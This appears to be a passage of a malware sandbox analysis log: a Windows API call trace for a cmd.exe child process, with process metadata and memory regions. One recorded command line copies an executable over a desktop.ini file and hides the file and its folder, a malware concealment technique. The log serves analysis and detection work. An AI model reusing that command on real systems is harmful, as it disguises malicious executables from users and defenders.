lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef118*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.473] GetFileType (hFile=0x4c) returned 0x1 [0119.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.473] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef168*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef168*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.473] GetFileType (hFile=0x4c) returned 0x1 [0119.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.473] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef1b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef1b8*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.474] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.474] GetFileType (hFile=0x4c) returned 0x1 [0119.474] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.474] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef208*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef208*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.474] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.474] GetFileType (hFile=0x4c) returned 0x1 [0119.474] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.474] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef258*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef258*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.474] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.474] GetFileType (hFile=0x4c) returned 0x1 [0119.474] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.474] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef2a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, 
lpOverlapped=0x0 | out: lpBuffer=0x1ef2a8*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.474] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.474] GetFileType (hFile=0x4c) returned 0x1 [0119.474] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.474] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef2f8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2f8*, lpNumberOfBytesWritten=0x1ee2fc*=0x20, lpOverlapped=0x0) returned 1 [0119.474] _get_osfhandle (_FileHandle=4) returned 0x54 [0119.474] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee2e8 | out: lpNewFilePointer=0x0) returned 1 [0119.474] _get_osfhandle (_FileHandle=4) returned 0x54 [0119.474] ReadFile (in: hFile=0x54, lpBuffer=0x1ef118, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee308, lpOverlapped=0x0 | out: lpBuffer=0x1ef118*, lpNumberOfBytesRead=0x1ee308*=0x200, lpOverlapped=0x0) returned 1 [0119.474] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.474] GetFileType (hFile=0x4c) returned 0x1 [0119.474] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.474] GetFileType (hFile=0x4c) returned 0x1 [0119.474] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.474] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef118*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef118*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.475] GetFileType (hFile=0x4c) returned 0x1 [0119.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.475] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef168*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef168*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.475] GetFileType (hFile=0x4c) returned 0x1 [0119.475] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0119.475] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef1b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef1b8*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.475] GetFileType (hFile=0x4c) returned 0x1 [0119.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.475] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef208*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef208*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.475] GetFileType (hFile=0x4c) returned 0x1 [0119.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.475] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef258*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef258*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.475] GetFileType (hFile=0x4c) returned 0x1 [0119.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.475] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef2a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2a8*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.475] GetFileType (hFile=0x4c) returned 0x1 [0119.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.475] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef2f8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2f8*, lpNumberOfBytesWritten=0x1ee2fc*=0x20, lpOverlapped=0x0) returned 1 [0119.475] _get_osfhandle (_FileHandle=4) returned 0x54 [0119.476] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x1ee2e8 | out: lpNewFilePointer=0x0) returned 1 [0119.476] _get_osfhandle (_FileHandle=4) returned 0x54 [0119.476] ReadFile (in: hFile=0x54, lpBuffer=0x1ef118, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee308, lpOverlapped=0x0 | out: lpBuffer=0x1ef118*, lpNumberOfBytesRead=0x1ee308*=0x200, lpOverlapped=0x0) returned 1 [0119.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.476] GetFileType (hFile=0x4c) returned 0x1 [0119.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.476] GetFileType (hFile=0x4c) returned 0x1 [0119.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.476] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef118*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef118*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.476] GetFileType (hFile=0x4c) returned 0x1 [0119.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.476] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef168*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef168*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.476] GetFileType (hFile=0x4c) returned 0x1 [0119.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.476] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef1b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef1b8*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.476] GetFileType (hFile=0x4c) returned 0x1 [0119.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.476] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef208*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef208*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, 
lpOverlapped=0x0) returned 1 [0119.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.476] GetFileType (hFile=0x4c) returned 0x1 [0119.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.476] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef258*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef258*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.476] GetFileType (hFile=0x4c) returned 0x1 [0119.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.476] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef2a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2a8*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.477] GetFileType (hFile=0x4c) returned 0x1 [0119.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.477] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef2f8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2f8*, lpNumberOfBytesWritten=0x1ee2fc*=0x20, lpOverlapped=0x0) returned 1 [0119.477] _get_osfhandle (_FileHandle=4) returned 0x54 [0119.477] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee2e8 | out: lpNewFilePointer=0x0) returned 1 [0119.477] _get_osfhandle (_FileHandle=4) returned 0x54 [0119.477] ReadFile (in: hFile=0x54, lpBuffer=0x1ef118, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee308, lpOverlapped=0x0 | out: lpBuffer=0x1ef118*, lpNumberOfBytesRead=0x1ee308*=0x200, lpOverlapped=0x0) returned 1 [0119.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.477] GetFileType (hFile=0x4c) returned 0x1 [0119.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.477] GetFileType (hFile=0x4c) returned 0x1 [0119.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.477] WriteFile (in: hFile=0x4c, 
lpBuffer=0x1ef118*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef118*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.477] GetFileType (hFile=0x4c) returned 0x1 [0119.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.477] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef168*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef168*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.477] GetFileType (hFile=0x4c) returned 0x1 [0119.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.477] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef1b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef1b8*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.477] GetFileType (hFile=0x4c) returned 0x1 [0119.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.477] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef208*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef208*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.477] GetFileType (hFile=0x4c) returned 0x1 [0119.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.477] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef258*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef258*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.478] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.478] GetFileType (hFile=0x4c) returned 0x1 [0119.478] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.478] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef2a8*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2a8*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.478] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.478] GetFileType (hFile=0x4c) returned 0x1 [0119.478] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.478] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef2f8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2f8*, lpNumberOfBytesWritten=0x1ee2fc*=0x20, lpOverlapped=0x0) returned 1 [0119.478] _get_osfhandle (_FileHandle=4) returned 0x54 [0119.478] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee2e8 | out: lpNewFilePointer=0x0) returned 1 [0119.478] _get_osfhandle (_FileHandle=4) returned 0x54 [0119.478] ReadFile (in: hFile=0x54, lpBuffer=0x1ef118, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee308, lpOverlapped=0x0 | out: lpBuffer=0x1ef118*, lpNumberOfBytesRead=0x1ee308*=0x32, lpOverlapped=0x0) returned 1 [0119.478] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.478] GetFileType (hFile=0x4c) returned 0x1 [0119.478] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.478] GetFileType (hFile=0x4c) returned 0x1 [0119.478] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.478] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef118*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef118*, lpNumberOfBytesWritten=0x1ee2fc*=0x32, lpOverlapped=0x0) returned 1 [0119.478] _get_osfhandle (_FileHandle=4) returned 0x54 [0119.478] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee2e8 | out: lpNewFilePointer=0x0) returned 1 [0119.478] _close (_FileHandle=4) returned 0 [0119.478] FindNextFileW (in: hFindFile=0x3d0e90, lpFindFileData=0x1ef37c | out: lpFindFileData=0x1ef37c) returned 0 [0119.479] GetLastError () returned 0x12 [0119.479] FindClose (in: 
hFindFile=0x3d0e90 | out: hFindFile=0x3d0e90) returned 1 [0119.479] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0119.479] _close (_FileHandle=3) returned 0 [0119.480] _get_osfhandle (_FileHandle=1) returned 0x7 [0119.480] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0119.480] _get_osfhandle (_FileHandle=1) returned 0x7 [0119.480] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0119.480] _get_osfhandle (_FileHandle=0) returned 0x3 [0119.480] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0119.480] SetConsoleInputExeNameW () returned 0x1 [0119.480] GetConsoleOutputCP () returned 0x1b5 [0119.480] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0119.480] SetThreadUILanguage (LangId=0x0) returned 0x409 [0119.480] exit (_Code=0) Process: id = "68" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea168e0" os_pid = "0xf3c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon 
Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9325 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9326 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 9327 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 9328 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 9329 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 9330 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9331 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 9332 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 9333 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 9334 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 9359 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" 
Region: id = 9360 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 9361 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9362 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 9363 start_va = 0x440000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 9364 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 9365 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 9366 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 9367 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9368 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 9369 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: 
"c:\\windows\\system32\\user32.dll") Region: id = 9370 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 9371 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 9372 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 9373 start_va = 0x310000 end_va = 0x3d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 9374 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 9375 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 9376 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 9377 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 9378 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 9379 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 9380 start_va = 0x450000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" 
Region: id = 9381 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 9382 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Region: id = 9415 start_va = 0x12d0000 end_va = 0x159efff entry_point = 0x12d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 121 os_tid = 0xf40 [0119.425] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12f904 | out: lpSystemTimeAsFileTime=0x12f904*(dwLowDateTime=0x84548fa0, dwHighDateTime=0x1d440a9)) [0119.425] GetCurrentProcessId () returned 0xf3c [0119.425] GetCurrentThreadId () returned 0xf40 [0119.425] GetTickCount () returned 0x2847a [0119.425] QueryPerformanceCounter (in: lpPerformanceCount=0x12f8fc | out: lpPerformanceCount=0x12f8fc*=17621417411) returned 1 [0119.426] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0119.426] __set_app_type (_Type=0x1) [0119.426] __p__fmode () returned 0x76b331f4 [0119.426] __p__commode () returned 0x76b331fc [0119.426] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0119.426] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0119.426] GetCurrentThreadId () returned 0xf40 [0119.426] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf40) returned 0x38 [0119.426] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0119.426] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0119.426] SetThreadUILanguage (LangId=0x0) returned 0x409 [0119.426] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, 
HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0119.426] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12f894 | out: phkResult=0x12f894*=0x0) returned 0x2 [0119.426] VirtualQuery (in: lpAddress=0x12f8cb, lpBuffer=0x12f864, dwLength=0x1c | out: lpBuffer=0x12f864*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0119.426] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12f864, dwLength=0x1c | out: lpBuffer=0x12f864*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0119.426] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12f864, dwLength=0x1c | out: lpBuffer=0x12f864*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0119.427] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12f864, dwLength=0x1c | out: lpBuffer=0x12f864*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0119.427] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12f864, dwLength=0x1c | out: lpBuffer=0x12f864*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0119.427] GetConsoleOutputCP () returned 0x1b5 [0119.427] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0119.427] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0119.427] _get_osfhandle 